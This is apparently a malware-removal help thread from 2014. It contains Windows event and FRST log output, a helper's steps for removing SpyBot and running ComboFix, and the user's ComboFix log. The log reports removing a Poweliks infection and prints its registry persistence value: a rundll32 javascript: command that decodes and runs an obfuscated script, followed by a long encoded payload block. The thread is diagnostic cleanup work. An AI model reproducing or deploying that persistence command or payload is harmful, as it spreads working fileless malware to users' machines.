A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\32.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FI\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\16.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\128.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ET\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES_419\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\EN_US\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (08/25/2014 09:53:10 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:41:01 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:31:53 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:21:25 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/25/2014 09:20:08 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
Error: (08/25/2014 09:18:52 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriver
AVGIDSShim
 
Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: vToolbarUpdater%%2
 
Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31
 
Error: (08/25/2014 08:23:12 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/25/2014 08:19:07 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
 
Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-25 09:48:31.237
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:31.054
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.886
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.700
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.286
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.009
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:29.734
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:29.432
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:47:50.973
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:47:50.762
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 65%
Total physical RAM: 3060.46 MB
Available physical RAM: 1043.32 MB
Total Pagefile: 6355.21 MB
Available Pagefile: 4190.75 MB
Total Virtual: 2047.88 MB
Available Virtual: 1907.04 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:221.74 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive g: (IT Drive) (Fixed) (Total:465.76 GB) (Free:188.98 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: BADAE880)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

ComboFix failed to delete the infection, probably due to SpyBot working in the background. I recommend uninstalling it, as this program is too weak for today's security expectations.

Also delete your version of ComboFix (simply move it to your Recycle Bin) and obtain a fresh one from the provided link before the next scan.



SpyBot S&D Warning

MVPS.org is no longer recommending SpyBot S&D due to very poor testing results (scroll down and read under Freeware Antispyware Products).
My advice is to get rid of this program. To do so:

  • Press the Windows key + R on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for SpyBot, right-click the entry and click Uninstall.

Please do it, because it may hinder the removals.

 

 

Scan with ComboFix

This is a very powerful tool that should be used only if advised by a Malware Analyst.
Do not run ComboFix on your own!


Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on the ComboFix icon and select Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.
If you encounter any issues with your internet connection after running ComboFix, please visit this link.
If an error about operation on the key marked for deletion appears after running the tool, please reboot your machine.
Don't forget to re-enable your previously switched-off protection software!


Programs and Features does not show a Spybot entry. I have also looked for it in the Start Menu as well as C:\Program Files. There are no references to Spybot in either of these locations. Since this is a 32-bit OS, there is no Program Files (x86). So, no need to look for Spybot there.

 

Any recommendations?


Here we go. Combofix log:

 

ComboFix 14-08-24.01 - savas.kyriakidis 08/25/2014  10:55:04.4.2 - x86
Running from: G:\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script payload removed]
J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\F"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-1GIo]`sI]#w&]M^U( ]Gp`s25x1*KZ2Tl`N5i`s?mpNj.M9-j!"W9!BfCo^Si2&T.Zw5}`sAji9Wt!9\mM1dI`99:39U.V.}pjs9i`.&"T.aDF}VwY"jB&]iDWHsw9lAVo]`1\jTjAi3D!".B.K`s&UjaB4y1jI82TP`.x5TVK4F96C(9L5j]xPT^WH:w9lV,J}`s}]ias^MgBmFslK`q!"j\"q.\l tsi`s&Uq1Gp.g!C(9L"joAjT9x[!D}ljV$]Z}\PixAj(9]Ij[;+AFA"Vw.IA9-lZ1G[2NA5TVgI ^-t.x\5HM}p9xiM8op0.$]As&ii9x8 w/mM1Np`s&`j4tIoV3p^VK]yV&Uis;jg!}L"(53]\iixfjjDrlq,o}j9f[igxi(g35([xKVV&5D#?A.$KoAu]VV\\TY$?jwot 9yd!3!jTXA}.wF}8s%]om!jT"W#C4K5.VS.VtIUj3Ijs$p:I%}qVA`i.dMXAPjwAgM[sjh9Ye ^GIZsB}qVr}""Y 3&T:jLHI Nf5j"XmoVhSZoX\A9|qo}s?V4U}jwA5x[k\+"/e l648wpn_1H8#I! 
Vw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA`2"]qNBp`s$}`sA5is~pj4iV^x:C^h]T^fJ!l/l`sU}`sA}iwA}jw$5s0IsVA9xa]qNBI:Apj`1A5is~pjw$}jwA5 3h#T^f}3l!l`sUn^9}tT^A}jw$5jo~p`sAUF4jqNBK:Apj`1M:V}ap9$}jwA5joA}iwA[K^!l`sG#w9}tT^L\s9B5!o~p`sA5jw$p`s35NApj`1q:V}ap^iiV^xUjoA}iwA}jw$p`s}\89}tT^D\s9B5!a}IsVA\!w$p`s$p`s$}`sq}iwap^iV^xUK)h#T^f}jw$p`s$}`sA}iAD\M8B5!X}IsVAmxajqNBp`s$}`sA5is~pj9}iF^xUKLh#T^fi3l!l`sU}`sA}iwA}jw$5tZ?sVAmF"jqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s!C^9}tTaX\s9B5!o~p`sAUV~jqNBp`s$}`ss5is~}!w$}jwA5&Lh#T^f}jw$p`sHt^9}tT^A}jw$5K#ZIsVA\!w$p`s$?.AOj`1A5is~pjg;iF^xUjoA}iwAi&"Fl`sU}`sA}ix&\M8B5!o~p`sAUaPqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw/?wwei0*k\s&6e39 U.so1qYk"F\/p`s$pjqz#NA.U3wyK~!CFaqU:aL\T8Aiy~ j8I.#0F1nV^Fi3j*:jo_1:Al"&4"KVFjmy9$}`sA"T5S5Lx.}.I6:(s5nV8*PM8jmy9$}^IK]p45i.\/U3aDj 1k5jw$p`}6HV1dPNALmT.~.L~dPFg.gjt}"jDe39fp`s$}0wk8sx/e Zq(M]wK V}j!lz.^tFm8s]}^1."i*:.3"][.aCCHA}iwA#V4 mwwoP Vl#TIh V\6(MHI.s6k(VxAjNfpqsp\qtlts}7534$[.aCCHA}iwAiKxG4w3z[wI3#"wr .4/9F2oj0Ntj&4dp`}/.ws }0wHmq9g.2w$}jws\Ma3]PwWe!4/4wwo Ak]q\n .1a(st2p^}.ts\Pj^jq.Z6Oi 1k5is~pjj6n.a("L$l##\FtM8d+qqzHoIl#"`hi8*9VVHmZsIj.xpjj}/?0Fjo.l"ft.pjw$}.jYj:XI\U4 eyx KwweCZsk\U4/P(aB9.2_+_1A5jw$j:qX?s9O8GAtjT}.5.4A82wC"M1A}iwA}j\UIs*fj`sAjpg&}?O$1x[xNbYl1Kg/1AsXK_V!}2IS}!NArs^+j.I6"32wCqAF}:OUI`Fe G9w6 wHnkDGI!o~p`s5(MOzNZV.I`FzijsS}isH+."+j g*IjAXep4ZjVzTrG}( _VIHo~Z}3kA:C[&}ZNn}2a1q."IZ2*PNpy9qAG?y4KjVx x(6[ 
9A}jw$pjoTjAt;i/R\Jy931CoHlq9A\!w$mUYUp`s$}`s(5#.Np9$}K\I9!HA}ixC?DXIGN/iZYA8o^v6Dtg]"l`wj\3gBpjVdHUYH 05\9Ts5lCjH}3wA5V]H3&*J&99?ZI3jNA2jp~sP9(5Kt".A2!5.wJ+`.4Iwwhi`sw"PHMIf9C]kR!9fsf}fI!PXO%jVm+}`9A}igsn.A.U3t2I`sAUj&XS2N9KAt3jNAA}3tHp3^(CkR\}s$A] wZt:\2p01$}`swjf"vjjl(9ls.k`935vg/1u%*?as$}`pcuit&}fw$}jw95l3\[T4Xiy"}4s5.[A}xFT82[ `*5 ^MmZs3"M"\}A1VKVI/#063j3Y;1?R-J!w&5!X3]3wZt gVp^9$}`2 6/DZH?R*d!o~pZ9ct2jop`s/I.}*]ZqFd"tApjw$]f49`24ItpjvtXD%S8qT}N3\[T&h}FA.t!4AKAq 9F"zIAI}5^w-^y11(Tt$S&1*}jwAnyB?trDAtMI*p02-}Z6&Ho~x]f"}g2}.j`};j:931 wGIyNh[b,29Ts~}2w5}L\&`!]&n3XXjL"/rU,f}NA2 pgsP(g((!BG;%\9!w$1 N]j_IfioV?("9\I.wo}jwsIj(Dn3wZ}.w/HwoT[A5D}f\qCM"Ttso7NG3c5.~(lj5"my3a\.Iw\+W7j:\g}?rht&hw}p9:tm`.?8ihh29|ji&*j&9$`c]kn2v35k~}nvy]+`s%j_9z:it p3w+ 0yty]w\o4&Jy~e1VV/[.I?[%^M6jl3mM^.H.AfU46Sym.KqF+HH%\nfInKK4$Hsx:}K$sHu~sP(\I89h6As|tU9A}jw35L]~.0m 9&4Ol:A]+UYX As29Ts~HMj9]f"5}2]*jPws}Fw2I N(ijNw[f9*CKA"gMV.H2NxtsTTp0V}IZ9oC`w25%3X1:1.\Vx:n!aji 9Xnj"++ApTjqo\[rR\ fwq:sBslV.*I!^op`,.w5q\.Vc"us0SF&T}3wA5jos}iwA}jX/l`sU}`sA}VwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$K:!kFPD4#^;9f\H8FN&Z"-mG!ArHt8i2Vy9!.DSVxq8x"w(iEj l!t(x-mw1s^ }we+jyJ3841xHK5q6N}Lau}oI3}q6stys!\i}7m3\q8:g!m1Ei!Ow8x"smboGty2oC+jX8:jdty(!}V6/&s\2m Iq5q6}^s,!\ 1Z|?SGt 5o5Z44}U^!t.D[(U68#`VE[9tXp?X8jjs!NGHXo?X8.`V;NGHz 8FNnjbK!^;[s~!1VTwFj0wJ3^;Ns,.tUo3^/S6HLA"tkAS+GphdZ"-m;3{|wYPno1!\ !!jxj;[M^Y\?X98U"V^:OAjy.z[sVLtptEPwz1 444w!v}39sNAIs4V.UeoIV"h,HIxj;e&"w( Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-07-25 to 2014-08-25  )))))))))))))))))))))))))))))))
.
.
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-25 13:55 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-25 13:35 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-25 12:26 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-25 15:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-25 14:49 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-25 13:16 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
